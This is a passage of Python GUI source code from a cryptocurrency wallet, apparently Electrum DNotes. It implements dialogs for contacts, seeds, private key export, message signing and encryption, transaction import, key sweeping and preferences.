vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum DNotes, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid DNotes address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid DNotes address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum_dnotes.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum DNotes was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum_dnotes import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("dnotes:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum DNotes was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_dnotes import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-dnotes-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum DNotes was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_dnotes.wallet import sweep_preparations
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_dnotes.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
#gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['NOTE', 'mNOTE', 'bits']
msg = (_('Base unit of your wallet.')
+ '\n1 NOTE = 1000 mNOTE. 1 mNOTE = 1000 bits.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'NOTE':
self.decimal_point = 8
elif unit_result == 'mNOTE':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
#gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_dnotes import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
#gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_list.refresh_headers()
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
#(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
#(fiat_widgets, _('Fiat')),
#(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum DNotes to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum DNotes Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
